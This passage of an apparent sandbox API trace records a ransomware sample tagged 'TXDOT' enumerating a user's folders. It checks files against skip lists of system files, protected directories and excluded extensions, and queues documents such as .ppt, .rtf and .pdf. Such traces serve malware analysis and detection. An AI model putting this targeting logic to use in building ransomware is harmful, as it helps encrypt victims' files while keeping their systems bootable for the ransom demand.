ftCreationTime.dwLowDateTime=0x200ac2e0, ftCreationTime.dwHighDateTime=0x1d5e80e, ftLastAccessTime.dwLowDateTime=0x7c772d80, ftLastAccessTime.dwHighDateTime=0x1d5e466, ftLastWriteTime.dwLowDateTime=0x7c772d80, ftLastWriteTime.dwHighDateTime=0x1d5e466, nFileSizeHigh=0x0, nFileSizeLow=0x18bc9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Yjcpzl.ppt", cAlternateFileName="")) returned 1 [0072.633] StrCmpW (psz1="Yjcpzl.ppt", psz2=".") returned 1 [0072.633] StrCmpW (psz1="Yjcpzl.ppt", psz2="..") returned 1 [0072.633] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.633] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.633] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Yjcpzl.ppt", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt" [0072.633] PathFindExtensionW (pszPath="Yjcpzl.ppt") returned=".ppt" [0072.633] StrCmpW (psz1=".ppt", psz2=".txd0t") returned -1 [0072.633] StrCmpIW (psz1="Yjcpzl.ppt", psz2="bootsect.bak") returned 1 [0072.633] StrCmpIW (psz1="Yjcpzl.ppt", psz2="iconcache.db") returned 1 [0072.633] StrCmpIW (psz1="Yjcpzl.ppt", psz2="thumbs.db") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2=" ransomware ") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2=" ransom ") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2="debug.txt") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2="boot.ini") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2="desktop.ini") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2="autorun.inf") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2="ntuser.dat") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2="ntldr") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2="ntdetect.com") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2="bootfont.bin") returned 1 [0072.634] StrCmpIW (psz1="Yjcpzl.ppt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.634] PathFindExtensionW (pszPath="Yjcpzl.ppt") returned=".ppt" [0072.634] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ppt") returned 0x0 [0072.634] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.635] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.635] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.638] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.638] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt" [0072.638] SetEvent (hEvent=0x3fc) returned 1 [0072.642] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75c97fc0, ftCreationTime.dwHighDateTime=0x1d5edde, ftLastAccessTime.dwLowDateTime=0x41dc0ad0, ftLastAccessTime.dwHighDateTime=0x1d5ed1a, ftLastWriteTime.dwLowDateTime=0x41dc0ad0, ftLastWriteTime.dwHighDateTime=0x1d5ed1a, nFileSizeHigh=0x0, nFileSizeLow=0xee1f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="_ZxYRX.rtf", cAlternateFileName="")) returned 1 [0072.642] StrCmpW (psz1="_ZxYRX.rtf", psz2=".") returned 1 [0072.642] StrCmpW (psz1="_ZxYRX.rtf", psz2="..") returned 1 [0072.642] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.642] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.642] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="_ZxYRX.rtf", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf" [0072.644] PathFindExtensionW (pszPath="_ZxYRX.rtf") returned=".rtf" [0072.644] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="bootsect.bak") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="iconcache.db") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="thumbs.db") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2=" ransomware ") returned 1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2=" ransom ") returned 1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="debug.txt") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="boot.ini") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="desktop.ini") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="autorun.inf") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="ntuser.dat") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="ntldr") returned -1 [0072.644] StrCmpIW (psz1="_ZxYRX.rtf", psz2="ntdetect.com") returned -1 [0072.645] StrCmpIW (psz1="_ZxYRX.rtf", psz2="bootfont.bin") returned -1 [0072.645] StrCmpIW (psz1="_ZxYRX.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.645] PathFindExtensionW (pszPath="_ZxYRX.rtf") returned=".rtf" [0072.645] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0072.649] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.649] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.649] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.649] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.649] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf" [0072.649] SetEvent (hEvent=0x3fc) returned 1 [0072.652] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75c97fc0, ftCreationTime.dwHighDateTime=0x1d5edde, ftLastAccessTime.dwLowDateTime=0x41dc0ad0, ftLastAccessTime.dwHighDateTime=0x1d5ed1a, ftLastWriteTime.dwLowDateTime=0x41dc0ad0, ftLastWriteTime.dwHighDateTime=0x1d5ed1a, nFileSizeHigh=0x0, nFileSizeLow=0xee1f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="_ZxYRX.rtf", cAlternateFileName="")) returned 0 [0072.652] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0072.652] GetProcessHeap () returned 0xe30000 [0072.652] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf508 | out: hHeap=0xe30000) returned 1 [0072.652] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe60e657f, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe60e657f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0072.652] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0072.653] GetProcessHeap () returned 0xe30000 [0072.653] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.653] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0072.653] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0072.653] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0072.653] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0072.653] StrCmpW (psz1="Contacts", psz2=".") returned 1 [0072.653] StrCmpW (psz1="Contacts", psz2="..") returned 1 [0072.660] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0072.660] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0072.660] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Contacts", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0072.660] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\system32\\") returned 0x0 [0072.660] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.660] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\system\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\local\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\boot\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\perflogs\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\programdata\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\drivers\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\wsus\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="crypt_detect") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="cryptolocker") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="ransomware") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\WINDOWS") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.661] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\Program Files") returned 0x0 [0072.661] GetProcessHeap () returned 0xe30000 [0072.661] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed31f0 [0072.661] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Contacts", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0072.661] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Contacts", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Contacts\\*") returned="C:\\Users\\FD1HVy\\Contacts\\*" [0072.661] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0072.661] StrCmpW (psz1=".", psz2=".") returned 0 [0072.661] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.662] StrCmpW (psz1="..", psz2=".") returned 1 [0072.662] StrCmpW (psz1="..", psz2="..") returned 0 [0072.662] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0072.662] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0072.662] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0072.662] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0072.662] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0072.662] GetProcessHeap () returned 0xe30000 [0072.662] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0072.662] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0072.662] StrCmpW (psz1="Cookies", psz2=".") returned 1 [0072.662] StrCmpW (psz1="Cookies", psz2="..") returned 1 [0072.662] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x36207f35, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x36207f35, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0072.662] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0072.662] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0072.662] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0072.662] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0072.662] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Desktop", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\system32\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\system\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\local\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\boot\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\perflogs\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\programdata\\") returned 0x0 [0072.662] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\drivers\\") returned 0x0 [0072.663] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\wsus\\") returned 0x0 [0072.663] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.663] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.663] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="crypt_detect") returned 0x0 [0072.663] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="cryptolocker") returned 0x0 [0072.663] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="ransomware") returned 0x0 [0072.663] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\WINDOWS") returned 0x0 [0072.663] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.663] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\Program Files") returned 0x0 [0072.663] GetProcessHeap () returned 0xe30000 [0072.663] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xed31f0 [0072.663] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.663] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\*") returned="C:\\Users\\FD1HVy\\Desktop\\*" [0072.663] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x36207f35, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x36207f35, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20f0 [0072.663] StrCmpW (psz1=".", psz2=".") returned 0 [0072.663] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x36207f35, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x36207f35, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.663] StrCmpW (psz1="..", psz2=".") returned 1 [0072.663] StrCmpW (psz1="..", psz2="..") returned 0 [0072.663] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb7b760, ftCreationTime.dwHighDateTime=0x1d5e678, ftLastAccessTime.dwLowDateTime=0x73a94270, ftLastAccessTime.dwHighDateTime=0x1d5e5c8, ftLastWriteTime.dwLowDateTime=0x73a94270, ftLastWriteTime.dwHighDateTime=0x1d5e5c8, nFileSizeHigh=0x0, nFileSizeLow=0x135f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3475V2DB.pdf", cAlternateFileName="")) returned 1 [0072.663] StrCmpW (psz1="3475V2DB.pdf", psz2=".") returned 1 [0072.663] StrCmpW (psz1="3475V2DB.pdf", psz2="..") returned 1 [0072.663] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.663] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.663] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="3475V2DB.pdf", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf") returned="C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf" [0072.663] PathFindExtensionW (pszPath="3475V2DB.pdf") returned=".pdf" [0072.663] StrCmpW (psz1=".pdf", psz2=".txd0t") returned -1 [0072.663] StrCmpIW (psz1="3475V2DB.pdf", psz2="bootsect.bak") returned -1 [0072.663] StrCmpIW (psz1="3475V2DB.pdf", psz2="iconcache.db") returned -1 [0072.663] StrCmpIW (psz1="3475V2DB.pdf", psz2="thumbs.db") returned -1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2=" ransomware ") returned 1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2=" ransom ") returned 1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2="debug.txt") returned -1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2="boot.ini") returned -1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2="desktop.ini") returned -1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2="autorun.inf") returned -1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2="ntuser.dat") returned -1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2="ntldr") returned -1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2="ntdetect.com") returned -1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2="bootfont.bin") returned -1 [0072.664] StrCmpIW (psz1="3475V2DB.pdf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.664] PathFindExtensionW (pszPath="3475V2DB.pdf") returned=".pdf" [0072.664] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pdf") returned 0x0 [0072.664] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) 